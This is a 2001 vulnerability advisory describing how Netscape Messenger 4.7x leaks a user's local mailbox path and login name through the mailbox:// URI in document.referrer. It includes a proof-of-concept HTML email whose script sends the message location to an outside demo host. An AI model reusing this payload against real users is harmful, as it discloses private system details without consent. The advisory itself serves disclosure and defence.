|
Vulnerability Netscape Messanger Affected Netscape 4.7x All Platforms Description '3APA3A' found following. There are known bugs in Netscape which require information on user's files location. This bug is not serious one, but it allows to get this location. Netscape Messanger uses internal protocol called mailbox://. The format of mailbox URI is mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber this URI contains full path to user's mailbox which usually contains user's login name and in case of Windows 9x - the path to Netscape installation. It's impossible to determine this location from javascript inside e-mail message, because Netscape hides document.location from javascript. It's possible to retrieve mailbox:// URI of the message. E.g., it's possible to retrieve mailbox location, user's system login and in some cases path to Netscape installation. When link invoked from message, Netscape sets "document.referrer" property to URI of the message contained this link. Javascript on the target page is able to retrieve this property and pass it to any location together with IP of calling machine. If you read this message with Netscape Messanger you can simply click reference http://www.security.nnov.ru/files/nsdemo.asp to see your mailbox location or you can force Netscape user to open this page with message like this: From: 3APA3A To: 3APA3A Subject: Test your Netscape Content-Type: text/html <html><script> window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location)); </script> <A HREF="http://www.security.nnov.ru/files/nsdemo.asp"> http://www.security.nnov.ru/files/nsdemo.asp</A> </html> This vulnerability only affects the users local (on the client machine) mailbox. If a user keeps his mail on an IMAP server, the the referer will show up as an IMAP:// url. Solution Netscape was contacted May, 30 2001. No feedback were given. Workaround: Don't use POP3, and keep your mail on an IMAP server.